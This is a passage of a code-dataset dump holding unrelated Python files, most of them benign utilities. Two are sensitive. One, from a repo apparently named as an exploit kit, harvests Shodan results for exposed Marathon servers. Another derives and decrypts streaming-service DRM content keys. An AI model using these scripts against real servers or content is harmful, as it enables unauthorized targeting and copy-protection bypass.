print(result)\n","repo_name":"bobowang2017/python_study","sub_path":"algorithm/leetcode/1/107二叉树的层次遍历II.py","file_name":"107二叉树的层次遍历II.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73203849068","text":"import shodan\nimport sys\nimport configparser\nimport requests\nimport threading\nimport queue\n\n\nconfig = configparser.ConfigParser()\nconfig.read('conf.ini')\n\n# Get testing value\ntest = config.getboolean('shodan', 'test')\n\nif test:\n test_url = config.get('shodan', 'test_url')\n\n# Get Shodan API key\nSHODAN_API_KEY = config.get('shodan', 'key')\napi = shodan.Shodan(SHODAN_API_KEY)\n\n# Get number of threads to use\nNUMT = config.get('shodan', 'NUMT')\n\nq = queue.Queue()\nsan = queue.Queue()\n\n\n'''\nSearch results using Shodan API\n'''\ndef search():\n try:\n results = api.search('X-Marathon-Leader')\n for result in results['matches']:\n try:\n ip = result['http']['host']\n ip_str = result['ip_str']\n if ip != ip_str:\n ip = ip_str\n port = str(result['port'])\n loc = result['http']['location']\n if port == '443':\n url = 'https://' + ip + loc\n elif port == '8443':\n url = 'https://' + ip + ':' + port + loc\n else:\n url = 'http://' + ip + ':' + port + loc\n q.put(url)\n except KeyError:\n continue\n\n except shodan.APIError as e:\n print('Error: {}'.format(e))\n\n\n'''\nSanitize list, remove not 200 OK URLs\n'''\ndef sanitize():\n url = q.get()\n try:\n status = requests.get(url, timeout=5, verify=False).status_code\n if status == 200:\n san.put(url)\n except (requests.ConnectTimeout, requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:\n return\n\n\n'''\nProducer work\n'''\ndef producer():\n try:\n search()\n except (OSError, KeyboardInterrupt):\n sys.exit(0)\n\n\n'''\nConsumer work\n'''\ndef consumer():\n while not q.empty():\n sanitize()\n\n\n'''\nStart threads function\n'''\ndef startThreads():\n p = threading.Thread(target=producer)\n consumers = [threading.Thread(target = consumer) for i in range(int(NUMT))]\n\n p.daemon = True\n p.start()\n p.join()\n for c in consumers:\n c.daemon = True\n c.start()\n for c in consumers:\n c.join()\n\n\ndef start():\n if test:\n return [test_url]\n startThreads()\n l = []\n while not san.empty():\n v = san.get()\n l.append(v)\n","repo_name":"b3d3c/BDsploit","sub_path":"shodan_thread.py","file_name":"shodan_thread.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"19114852987","text":"# -*- coding: utf-8 -*-\nfrom lightsite import models\n'''\nМодуль, отвечающий за получение данных из БД\n'''\n\ndef getAllLogos ():\n '''\n :returns ({'companyId' : companyId,\n 'logoId' : logoId,\n 'photoPath' : logoPhotoPath\n 'kpFilePath' : kpFileName, \n 'descFilePath' : descFilePath\n }, ...)\n \n !!! ДОЛЖЕН БЫТЬ ОТСОРТИРОВАН ПО companyId !!!\n '''\n \n return [{'companyId' : logo.company.id,\n 'logoId' : logo.id,\n 'photoPath' : logo.photo.path,\n 'kpFilePath' : logo.serial_kp_file.path,\n 'descFilePath': logo.serial_desc_file.path} for logo in models.CompanyLogo.objects.all().order_by('company') if logo.serial_kp_file and logo.serial_desc_file]\n \ndef addLogoStatistic (logoId, pos):\n '''\n Сохранение результатов поиска\n \n @param: logoId - идентификатор companyLogo\n @param: position - позиция в результате\n '''\n l = models.CompanyLogo.objects.get(pk=logoId)\n if not l:\n raise Exception('Company logo with id = %s does not exists' % logoId)\n if not pos:\n raise Exception('Position can not be %s' % pos)\n row = models.LogoStatistic(logo=l, position=pos)\n row.save()","repo_name":"abryazgin/detector","sub_path":"deta/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25554029729","text":"\"\"\"\"\"\nThis script downloads the data needed for analysis from the Minsa database.\n It uses series that are in the yaml config file.\n\"\"\"\n\nfrom datetime import date\nimport urllib\nfrom urllib import request\nimport os\nimport progressbar\nimport src.utilities as utils\n\n\n\ndef create_path():\n \n config = utils.read_config()\n # Get date for the filename.\n today = date.today()\n date_str = today.strftime(\"%b_%d_%Y\")\n \n # Define the filename and path to download it.\n path = os.path.join(config['data']['rawFilePath'], f'fallecidos_sinadef_{date_str}.csv')\n return path\n\ndef check_path_existance(path):\n \n \"\"\"\n Iterate over files in that directory \n to see if it already exists.\n \"\"\"\n config = utils.read_config()\n for item in os.scandir(config['data']['rawFilePath']):\n if item.is_file():\n if item.name in path:\n print(\"\\nFile already up-to-date.\")\n print(f\"File found: {item.name}\\n\")\n break\n \n else:\n download_raw_data(path)\n \ndef download_raw_data(path):\n \n print(\"\\nDownloading file...\\n'\")\n # Define url to download the file from.\n url = 'https://cloud.minsa.gob.pe/s/nqF2irNbFomCLaa/download'\n \n # Open url to avoid Error 403 (forbidden)\n opener = urllib.request.URLopener()\n opener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n \n # Download file.\n opener.retrieve(url, path, show_progress)\n print('Download finished.\\n')\n \npbar = None\n\ndef show_progress(block_num, block_size, total_size):\n \"\"\" ProgressBar setting. (for UX)\"\"\"\n \n global pbar \n if pbar is None:\n pbar = progressbar.ProgressBar(maxval=total_size)\n pbar.start()\n\n downloaded = block_num * block_size\n if downloaded < total_size:\n pbar.update(downloaded)\n else:\n pbar.finish()\n pbar = None \n\n\ndef main():\n path = create_path()\n check_path_existance(path)\n \nif __name__ == \"__main__\":\n main() \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"leo-padron/Exploratory-Data-Analysis-Peru-Covid-Casualties","sub_path":"src/download_raw_data.py","file_name":"download_raw_data.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11255810922","text":"import numpy as np\nimport os\nimport momentnet\nimport random\nimport tensorflow as tf\nimport json\nimport dataformat\nimport shutil\nfrom array import array\n\nweight_set_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"weight_sets\")\nweight_sets = []\n\n\ndef discover_weight_set():\n weight_sets.clear()\n for name in os.listdir(weight_set_path):\n pwd = os.path.join(weight_set_path, name)\n set_file = os.path.join(pwd, \"set.json\")\n if os.path.isdir(pwd) and os.path.exists(set_file):\n with open(set_file, \"r\") as file:\n set_data = json.load(file)\n weight_sets.append(set_data)\n\n\ndiscover_weight_set()\n\n\ntemplate_set_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"templates\")\ntemplate_paths = []\n\n\ndef discover_template_set():\n template_paths.clear()\n for name in os.listdir(template_set_path):\n pwd = os.path.join(template_set_path, name)\n if os.path.isdir(pwd):\n template_paths.append(name)\n\n\ndiscover_template_set()\n\n\nclass Runner:\n\n def __init__(self):\n self.running = False\n self.setup(0)\n self.change_template(0)\n self.collect_template_flag = -1\n\n def change_template(self, template_index):\n if len(template_paths) < template_index:\n return False\n self.template_index = template_index\n self.templates, self.template_labels = dataformat.read_template_directory(self.formatter, os.path.join(template_set_path, template_paths[self.template_index]), with_flip=True)\n print(template_paths[self.template_index])\n return True\n\n def setup(self, index):\n self.index = index\n if len(weight_sets) <= self.index:\n return False\n s = weight_sets[self.index][\"size\"]\n self.size = (s[0], s[1])\n self.num_layers = weight_sets[self.index][\"num_layers\"]\n self.session_name = \"weight_sets/\" + weight_sets[self.index][\"session_name\"]\n\n self.formatter = dataformat.DataFormat(self.size[0])\n\n self.close_down()\n\n print(self.session_name)\n num_intra_class = 10\n num_inter_class = 20\n self.comparator = momentnet.Comparator((2, self.size[0]), self.size[1], num_intra_class=num_intra_class, num_inter_class=num_inter_class, layers=self.num_layers)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.running = True\n self.sess = tf.Session(config=config)\n self.sess.run(tf.global_variables_initializer())\n self.comparator.load_session(self.sess, self.session_name)\n return True\n\n def process(self, frames):\n if not self.running:\n return None\n\n if isinstance(frames, list):\n data = np.zeros([len(frames), 2, self.size[0]], dtype=np.float32)\n for i, frame in enumerate(frames):\n data[i, ...] = self.formatter.format(frame)\n c, raw = self.comparator.process(self.sess, np.reshape(data, [-1, self.size[0] * 2]), np.reshape(self.templates, [-1, self.size[0] * 2]))\n raw = raw[:, c].flatten()\n classes = self.template_labels[c, 0]\n flip_or_not = self.template_labels[c, 1]\n\n else:\n frame = frames\n data = self.formatter.format(frame)\n c, raw = self.comparator.process(self.sess, np.reshape(data, [-1, self.size[0] * 2]), np.reshape(self.templates, [-1, self.size[0] * 2]))\n raw = raw[:, c].flatten()\n classes = self.template_labels[c, 0]\n flip_or_not = self.template_labels[c, 1]\n if self.collect_template_flag >= 0:\n print(self.collect_template_flag)\n dataformat.write_to_template_directory(frame, random.randint(0, 100000), self.collect_template_flag, self.formatter, template_paths[self.template_index])\n self.collect_template_flag = -1\n\n return classes, raw, flip_or_not\n\n def raise_template_flag(self, label):\n print(label)\n self.collect_template_flag = int(label)\n\n def close_down(self):\n if self.running:\n self.sess.close()\n tf.reset_default_graph()\n self.running = False\n\n def get_weight_sets(self):\n discover_weight_set()\n return weight_sets, self.index\n\n def get_template_sets(self):\n discover_template_set()\n return template_paths, self.template_index\n\n def archive_selected(self):\n artifact_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"artifacts\")\n pack_dir = os.path.join(artifact_dir, \"pack\")\n if os.path.exists(pack_dir):\n shutil.rmtree(os.path.join(artifact_dir, \"pack\"))\n os.makedirs(os.path.join(artifact_dir, \"pack\"))\n weight_path = \"/\".join(weight_sets[self.index][\"session_name\"].split(\"/\")[:-1])\n print(weight_path)\n shutil.copytree(os.path.join(weight_set_path, weight_path), os.path.join(artifact_dir, \"pack\", weight_path))\n shutil.copytree(os.path.join(template_set_path, template_paths[self.template_index]), os.path.join(artifact_dir, \"pack\", \"templates\"))\n shutil.make_archive(os.path.join(artifact_dir, \"pack\"), 'gztar', os.path.join(artifact_dir, \"pack\"))\n return os.path.join(artifact_dir, \"pack.tar.gz\")\n\n def save_weight_for_web_download(self):\n if not self.running:\n return None\n\n weights = self.comparator.get_weights(self.sess, np.reshape(self.templates, [-1, self.size[0] * 2]))\n weights.append(self.template_labels[:, 0])\n\n web_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"web\")\n model_dir = os.path.join(web_dir, \"model\")\n if os.path.exists(model_dir):\n shutil.rmtree(model_dir)\n os.makedirs(model_dir)\n\n write_model_weight(web_dir, weights, \"model/model\")\n\n\ndef write_model_weight(root, weights, name):\n outfile_name = name + \".json\"\n with open(os.path.join(root, outfile_name), 'w') as outfile:\n\n data = []\n for i, w in enumerate(weights):\n if isinstance(w, list):\n child_file_name = write_model_weight(root, w, name + \"_\" + str(i))\n data.append({\"t\": \"n\",\n \"path\": child_file_name})\n else:\n child_file_name = name + \"_\" + str(i) + \".bin\"\n with open(os.path.join(root, child_file_name), 'wb') as child_output:\n if w.dtype == np.int32:\n array('i', w.astype(np.int32).flatten().tolist()).tofile(child_output)\n data.append({\"t\": \"i\",\n \"shape\": w.shape,\n \"path\": child_file_name})\n else:\n array('f', w.astype(np.float32).flatten().tolist()).tofile(child_output)\n data.append({\"t\": \"f\",\n \"shape\": w.shape,\n \"path\": child_file_name})\n\n print(\"writing to \", outfile_name)\n json.dump(data, outfile)\n return outfile_name\n\n\nif __name__ == '__main__':\n\n for weight in weight_sets:\n print(weight)\n\n for path in template_paths:\n print(path)\n","repo_name":"bitstudio/zodiac_google","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"40949744547","text":"# -*- coding: utf-8 -*-\n\n\n\nfrom ipaddress import ip_address\n\n\ndef find_n_ip(ip_from_range1, range1, range2):\n range_list = \"-\".join([range1, range2]).split(\"-\")\n start1, end1, start2, end2 = [ip_address(i) for i in range_list]\n\n ip = ip_address(ip_from_range1)\n\n current_ip = start1\n index = 0\n while True:\n if current_ip == ip:\n break\n elif current_ip > end1:\n raise ValueError(f\"IP {ip} не в диапазоне {range1}\")\n index += 1\n current_ip += 1\n\n match_ip = start2\n for _ in range(index):\n match_ip += 1\n if match_ip > end2:\n raise ValueError(f\"Найденный IP {match_ip} не в диапазоне {range2}\")\n return str(match_ip)\n\n\ndef find_n_ip(ip_from_range1, range1, range2):\n range_list = \"-\".join([range1, range2]).split(\"-\")\n start1, end1, start2, end2 = [int(ip_address(i)) for i in range_list]\n ip = int(ip_address(ip_from_range1))\n if ip > end1:\n raise ValueError(f\"IP {ip} не в диапазоне {range1}\")\n\n index = ip - start1\n match_ip = start2 + index\n if match_ip > end2:\n raise ValueError(f\"Найденный IP {match_ip} не в диапазоне {range2}\")\n return str(ip_address(match_ip))\n\n\nif __name__ == \"__main__\":\n print(find_n_ip(\"10.1.1.127\", \"10.1.1.100-10.1.2.200\", \"50.1.1.110-50.1.2.210\"))\n","repo_name":"natenka/pyneng-tasks-solutions","sub_path":"answers/12_useful_modules/task_12_4.py","file_name":"task_12_4.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26364346496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2022/07/07\n\n@author: Junjie Chen\n\n如果类B的某个成员self.fa是类A的实例a, 则如果B中更改了a的某个属性, 则a的那个属性也会变.\n\n\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport collections\nfrom transformers import optimization\n\n#内存分析工具\nfrom memory_profiler import profile\nimport objgraph\nimport gc\n\nimport matplotlib\n# matplotlib.use('TkAgg')\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nfrom pylab import tick_params\nimport copy\nfrom matplotlib.pyplot import MultipleLocator\n\n\n# 本项目自己编写的库\n# from ColorPrint import ColoPrint\n# color = ColoPrint()\n# sys.path.append(\"..\")\n# from Option import args\n\n\nfontpath = \"/usr/share/fonts/truetype/windows/\"\nfontpath1 = \"/usr/share/fonts/truetype/msttcorefonts/\"\nfontpath2 = \"/usr/share/fonts/truetype/NerdFonts/\"\n\n\nclass net(nn.Module):\n def __init__(self):\n super(net,self).__init__()\n self.fc = nn.Linear(1,10)\n def forward(self,x):\n return self.fc(x)\n\n\ndef make_optimizer(args, net, compr = '', snr = ''):\n\n '''\n make optimizer and scheduler together\n '''\n # optimizer\n # filter() 函数用于过滤序列,过滤掉不符合条件的元素,返回一个迭代器对象,如果要转换为列表,可以使用 list() 来转换。\n # 该接收两个参数,第一个为函数,第二个为序列,序列的每个元素作为参数传递给函数进行判断,然后返回 True 或 False,最后将返回 True 的元素放到新列表中。\n trainable = filter(lambda x: x.requires_grad, net.parameters())\n\n # trainable = net.parameters()\n # lr = 1e-4, weight_decay = 0\n kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}\n\n # optimizer = ADAM\n if args.optimizer == 'SGD':\n optimizer_class = torch.optim.SGD\n kwargs_optimizer['momentum'] = args.momentum\n elif args.optimizer == 'ADAM':\n optimizer_class = torch.optim.Adam\n kwargs_optimizer['betas'] = args.betas # (0.9, 0.999)\n kwargs_optimizer['eps'] = args.epsilon # 1e-8\n elif args.optimizer == 'RMSprop':\n optimizer_class = torch.optim.RMSprop\n kwargs_optimizer['eps'] = args.epsilon\n\n # scheduler, milestones = 0, gamma = 0.5\n milestones = list(map(lambda x: int(x), args.decay.split('-'))) # [20, 40, 60, 80, 100, 120]\n kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma} # args.gamma =0.5\n scheduler_class = torch.optim.lr_scheduler.MultiStepLR\n\n # warmup_class = optimization.get_polynomial_decay_schedule_with_warmup\n # kwargs_warmup = {\"num_warmup_steps\":args.warm_up_ratio*total_steps, \"num_training_steps\":total_steps,\"power\":args.power,\"lr_end\":args.lr_end}\n\n class CustomOptimizer(optimizer_class):\n def __init__(self, *args, **kwargs):\n super(CustomOptimizer, self).__init__(*args, **kwargs)\n self.lr = []\n self.cn = self.__class__.__name__\n return\n\n def _register_scheduler(self, scheduler_class, **kwargs):\n self.scheduler = scheduler_class(self, **kwargs)\n\n def schedule(self):\n self.scheduler.step()\n\n def get_lr(self):\n return self.scheduler.get_lr()[0]\n\n def get_last_epoch(self):\n return self.scheduler.last_epoch\n\n def updatelr(self):\n lr = self.get_lr()\n self.lr.append(lr)\n return lr\n\n def save_lr(self, path, compr = '', tra_snr = 'random'):\n\n if compr != '' :\n basename = f\"_{self.cn}_compr={compr:.1f}_trainSnr={tra_snr}(dB)\"\n else:\n basename = f\"_{self.cn}\"\n torch.save(self.lr, os.path.join(path, f\"lr{basename}.pt\"))\n self.plot_lr(self.lr, path, compr = compr, snr = tra_snr)\n return\n\n def reset_state(self):\n self.state = collections.defaultdict(dict)\n self.scheduler.last_epoch = 0\n #self.scheduler._last_lr = 0\n for param_group in self.param_groups:\n param_group[\"lr\"] = args.lr\n\n milestones = list(map(lambda x: int(x), args.decay.split('-'))) # [20, 40, 60, 80, 100, 120]\n kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma} # args.gamma =0.5\n self.scheduler = scheduler_class(self, **kwargs_scheduler)\n\n # kwargs_warmup = {\"num_warmup_steps\":args.warm_up_ratio*total_steps, \"num_training_steps\":total_steps,\"power\":args.power,\"lr_end\":args.lr_end}\n # self.scheduler = warmup_class(self, **kwargs_warmup)\n return\n\n # 在不同的画布中画各个损失函数的结果.\n def plot_lr(self, Lr, savepath, compr = '', snr = ''):\n if compr != '' :\n basename = f\"_{self.cn}_compr={compr:.1f}_trainSnr={snr}(dB)\"\n title = r'$\\mathrm{{R}}={:.1f},\\mathrm{{SNR}}_\\mathrm{{train}} = {}\\mathrm{{(dB)}}$'.format(compr, snr)\n else:\n basename = f\"_{self.cn}\"\n title = ''\n epoch = len(Lr)\n X = np.linspace(1, epoch, epoch)\n\n fig = plt.figure(figsize=(6, 5), constrained_layout=True)\n font = FontProperties(fname=fontpath1+\"Times_New_Roman.ttf\", size = 20)\n plt.plot(X, Lr, )\n plt.xlabel('Epoch',fontproperties=font)\n plt.ylabel('Learning rate',fontproperties=font)\n #plt.title(label,fontproperties=font)\n #plt.grid(True)\n\n # font1 = {'family':'Times New Roman','style':'normal','size':16}\n # legend1 = plt.legend(loc='best', borderaxespad=0, edgecolor='black', prop=font1,)\n # frame1 = legend1.get_frame()\n # frame1.set_alpha(1)\n # frame1.set_facecolor('none') # 设置图例legend背景透明\n\n ax=plt.gca()\n ax.spines['bottom'].set_linewidth(2);###设置底部坐标轴的粗细\n ax.spines['left'].set_linewidth(2); ###设置左边坐标轴的粗细\n ax.spines['right'].set_linewidth(2); ###设置右边坐标轴的粗细\n ax.spines['top'].set_linewidth(2); ###设置上部坐标轴的粗细\n\n plt.tick_params(direction='in',axis='both',top=True,right=True,labelsize=16,width=3)\n labels = ax.get_xticklabels() + ax.get_yticklabels()\n [label.set_fontname('Times New Roman') for label in labels]\n [label.set_fontsize(16) for label in labels] #刻度值字号\n\n fontt = {'family':'Times New Roman','style':'normal','size':22}\n if title != '':\n plt.suptitle(title, fontproperties=fontt, )\n\n #plt.tight_layout(pad=2, h_pad=1, w_pad=1)# 使得图像的四周边缘空白最小化\n out_fig = plt.gcf()\n # out_fig.savefig(os.path.join(savepath, f\"lr{basename}.pdf\"))\n out_fig.savefig(os.path.join(savepath, f\"lr{basename}.eps\"))\n #plt.show()\n plt.close()\n return\n\n optimizer = CustomOptimizer(trainable, **kwargs_optimizer)\n optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)\n #optimizer._register_scheduler(warmup_class, **kwargs_warmup)\n\n return optimizer\n\n\n\n# model = net()\n# LR = 0.01\n# opt = make_optimizer(args, model, \"test\" )\n# loss = torch.nn.CrossEntropyLoss()\n\n# lr_list1 = []\n# lr_list2 = []\n# for epoch in range(200):\n# for i in range(20):\n# y = torch.randint(0, 9, (10,10))*1.0\n# opt.zero_grad()\n# out = model(torch.randn(10,1))\n# lss = loss(out, y)\n# # lss = Variable(lss, requires_grad = True)\n# lss.backward()\n# opt.step()\n# opt.schedule()\n# lr_list2.append(opt.get_lr())\n# lr_list1.append(opt.state_dict()['param_groups'][0]['lr'])\n\n# fig, axs = plt.subplots(1,1, figsize=(6,6))\n# axs.plot(range(len(lr_list1)),lr_list1,color = 'r')\n# #plt.plot(range(100),lr_list2,color = 'b')\n# out_fig = plt.gcf()\n# out_fig.savefig(\"/home/jack/snap/11.pdf\")\n# plt.show()\n# plt.close(fig)\n\n\n# from option import args\n# ckp = checkpoint(args)\n# ckp.InittestDir('aaaa')\n# for idx_data, ds in enumerate(args.data_test):\n# for comprate_idx, compressrate in enumerate(args.CompressRateTrain):\n# ckp.InitTestMetric(compressrate, ds)\n# for snr_idx, snr in enumerate( args.SNRtest):\n# ckp.AddTestMetric(compressrate, snr, ds)\n# for i in range(20):\n# metric = torch.tensor([comprate_idx,comprate_idx+snr_idx])\n# ckp.UpdateTestMetric(compressrate, ds,metric)\n# ckp.MeanTestMetric(compressrate, ds,2)\n\n# ckp.PlotTestMetric()\n\n# 使用时:\n\"\"\"\n\nmodel = net()\nLR = 0.01\noptimizer = make_optimizer( args, model, )\n\n\nlr_list1 = []\n\nfor epoch in range(200):\n for X,y in dataloder:\n optimizer.step()\n optimizer.schedule()\n lr_list1.append(optimizer.state_dict()['param_groups'][0]['lr'])\nplt.plot(range(200),lr_list1,color = 'r')\n\nplt.show()\n\n\"\"\"\n","repo_name":"junjiecjj/Python","sub_path":"AdversaryAttack/Optimizer.py","file_name":"Optimizer.py","file_ext":"py","file_size_in_byte":9137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19979784827","text":"import numpy as np\nimport pandas as pd\n\ndef get_num_periods(compound_on):\n if isinstance(compound_on,int) or compound_on=='MonthEnd':\n N = 12\n else:\n offset = getattr(pd.tseries.offsets,compound_on)\n N = len(pd.date_range('2000-01-01','2000-12-31',freq=offset(1)))\n return N\n\nclass Account(object):\n \"\"\"Account with compounding interest\"\"\"\n def __init__(self, name, balance, interest_rate=0,\n compound_on=1,\n verbose=True):\n \"\"\"\n Parameters\n ----------\n name : str\n Identifier for account\n balance : float\n Starting balance\n interest_rate : float\n Fixed interest rate [%]\n compound_on : int or str\n Integer day of month or pandas timeseries offset string\n (e.g., \"MonthEnd\")--see `pandas.tseries.offsets`\n \"\"\"\n self.name = name\n self.init_balance = balance\n assert interest_rate >= 0, 'Interest rate [%] should be >= 0.0'\n self.interest_rate = interest_rate\n try:\n self.compound_on_day = int(compound_on)\n except ValueError:\n self.compound_offset = getattr(pd.tseries.offsets, compound_on)\n self.compound_on_day = None\n self.verbose = verbose # DEBUG\n\n def __str__(self):\n return f'{self.name} ({self.__class__.__name__})'\n\n def init(self,tseries):\n self.last_update = tseries[0]\n self.df = pd.DataFrame(index=tseries,\n columns=['balance','deposit_from','withdrawal_to'])\n self.df.loc[tseries[0],'balance'] = self.init_balance\n\n def update(self,date):\n if self.interest_rate == 0:\n return\n compound_interest = False\n if self.compound_on_day is None:\n # update based on pandas tseries offset\n target_date = date + self.compound_offset(0)\n if date == target_date:\n compound_interest = True\n elif date.day == self.compound_on_day:\n # update based on integer day\n compound_interest = True\n if compound_interest:\n current_balance = self.df.loc[self.last_update,'balance']\n self.df.loc[date,'balance'] = current_balance*(1+self.interest_rate/100)\n if self.verbose:\n print(date,'update balance of',self.name)\n self.last_update = date\n\n def deposit(self,date,amount,from_acct):\n current_balance = self.df.loc[self.last_update,'balance']\n self.df.loc[date,'balance'] = current_balance + amount\n if isinstance(from_acct,str):\n from_acct_name = from_acct\n else:\n from_acct_name = from_acct.name\n if pd.isna(self.df.loc[date,'deposit_from']):\n self.df.loc[date,'deposit_from'] = from_acct_name\n else:\n self.df.loc[date,'deposit_from'] += ',' + from_acct_name\n self.last_update = date \n\n def withdraw(self,date,amount,to_acct):\n current_balance = self.df.loc[self.last_update,'balance']\n self.df.loc[date,'balance'] = current_balance - amount\n if isinstance(to_acct,str):\n to_acct_name = to_acct\n else:\n to_acct_name = to_acct.name\n if pd.isna(self.df.loc[date,'withdrawal_to']):\n self.df.loc[date,'withdrawal_to'] = to_acct_name\n else:\n self.df.loc[date,'withdrawal_to'] += ',' + to_acct_name\n self.last_update = date \n\n def finalize(self):\n self.df = self.df.dropna(how='all')\n\n\nclass Savings(Account):\n def __init__(self,name,balance,APY,compound_on=1):\n \"\"\"\n Parameters\n ----------\n name : str\n Identifier for account\n balance : float\n Starting balance\n APY : float\n Annual percentage yield [%]\n compound_on : int or str\n Integer day of month or pandas timeseries offset string\n (e.g., \"MonthEnd\")--see `pandas.tseries.offsets`\n \"\"\"\n N = get_num_periods(compound_on)\n interest_rate = 100 * ((1+APY/100)**(1.0/N) - 1)\n super().__init__(name,balance,interest_rate,compound_on)\n if self.verbose:\n print('annual periods for APY interest rate:',N)\n print(f'calculated interest rate = {self.interest_rate:g}%')\n\n\nclass Loan(Account):\n \"\"\"Loan with annual percentage rate\"\"\"\n def __init__(self,name,balance,interest_rate,compound_on=1):\n \"\"\"\n Parameters\n ----------\n name : str\n Identifier for account\n balance : float\n Starting balance\n interest_rate : float\n Fixed interest rate [%]\n compound_on : int or str\n Integer day of month or pandas timeseries offset string\n (e.g., \"MonthEnd\")--see `pandas.tseries.offsets`\n \"\"\"\n assert balance < 0, 'debt should have a negative balance'\n N = get_num_periods(compound_on)\n interest_rate_per_period = interest_rate / N\n super().__init__(name,balance,interest_rate_per_period,compound_on)\n\n def init(self,tseries):\n self.last_update = tseries[0]\n self.df = pd.DataFrame(index=tseries,\n columns=['principal','interest_paid','interest_due','deposit_from'])\n self.df.loc[tseries[0],'principal'] = self.init_balance\n self.df.loc[tseries[0],'interest_due'] = 0.0\n\n def update(self,date):\n if self.interest_rate == 0:\n return\n compound_interest = False\n if self.compound_on_day is None:\n # update based on pandas tseries offset\n target_date = date + self.compound_offset(0)\n if date == target_date:\n compound_interest = True\n elif date.day == self.compound_on_day:\n # update based on integer day\n compound_interest = True\n if compound_interest:\n current_principal = self.df.loc[self.last_update,'principal']\n self.df.loc[date,'principal'] = current_principal\n self.df.loc[date,'interest_due'] = current_principal*self.interest_rate/100\n if self.verbose:\n print(date,'update interest due for',self.name)\n self.last_update = date\n if self.df.loc[self.last_update,'principal'] >= 0:\n print(date,':',self.name,'paid off!')\n # stop updating\n self.interest_rate = 0\n elif self.df.loc[self.last_update,'principal'] > 0:\n self.df.loc[self.last_update,'principal'] = 0\n if self.verbose:\n print(date,':',self.name,'is already paid off! Zeroing principal')\n \n def deposit(self,date,amount,from_acct):\n \"\"\"A.k.a. make a payment\"\"\"\n current_principal = self.df.loc[self.last_update,'principal']\n current_interest = self.df.loc[self.last_update,'interest_due']\n toward_interest = min(amount,-current_interest)\n toward_principal = amount - toward_interest\n self.df.loc[date,'principal'] = current_principal + toward_principal\n self.df.loc[date,'interest_paid'] = toward_interest\n self.df.loc[date,'interest_due'] = current_interest + toward_interest\n if isinstance(from_acct,str):\n from_acct_name = from_acct\n else:\n from_acct_name = from_acct.name\n if pd.isna(self.df.loc[date,'deposit_from']):\n self.df.loc[date,'deposit_from'] = from_acct_name\n else:\n self.df.loc[date,'deposit_from'] += ',' + from_acct_name\n self.last_update = date\n\n def withdraw(self,date,amount,to_acct):\n raise RuntimeError('Withdrawal from a loan account is not defined')\n\n def finalize(self):\n super().finalize()\n assert np.all(self.df['interest_due'] == 0)\n self.df = self.df.drop(columns='interest_due')\n","repo_name":"ewquon/adulting","sub_path":"financials/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":7915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41115755046","text":"import struct\nimport hmac\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom binascii import unhexlify\n\nimport config\n\ndef get_key_from_id(deviceid, usertoken, session, key_id):\n params = config._MEDIATOKEN_API_PARAMS\n auth_header = {\"Authorization\": \"Bearer \" + usertoken}\n res = session.get(config._MEDIATOKEN_API, params=params, headers=auth_header)\n jsonres = res.json()\n mediatoken = jsonres['token']\n\n res = session.post(config._LICENSE_API, params={\"t\": mediatoken}, json={\"kv\": \"a\", \"lt\": key_id})\n jsonres = res.json()\n cid = jsonres['cid']\n k = jsonres['k']\n\n res = sum([config.STRTABLE.find(k[i]) * (58 ** (len(k) - 1 - i))\n for i in range(len(k))])\n cipherkey = struct.pack('>QQ', res >> 64, res & 0xffffffffffffffff)\n\n h = hmac.new(unhexlify(config.HKEY),\n (cid + deviceid).encode(\"utf-8\"),\n digestmod=hashlib.sha256)\n aeskey = h.digest()\n\n aes = AES.new(aeskey, AES.MODE_ECB)\n plainkey = aes.decrypt(cipherkey)\n\n return plainkey","repo_name":"shouko/abmlicense-proxy","sub_path":"abm_license.py","file_name":"abm_license.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36074724796","text":"from pydriller import Repository\nfrom erlport.erlterms import Atom\nimport sys\n\ndef integration_check():\n return Atom(b\"ok\")\n\ndef analyze(repo_url, auth_token):\n try:\n repo = Repository(repo_url.decode())\n return _analyze(repo)\n except:\n return (Atom(b\"error\"), \"Could not analyze repository\".encode())\n\ndef _analyze(repo):\n num_commits = _count_commits(repo)\n user_commits_histogram = _histogram_by_user(repo)\n monthly_commits_histogram = _histogram_by_month(repo)\n return 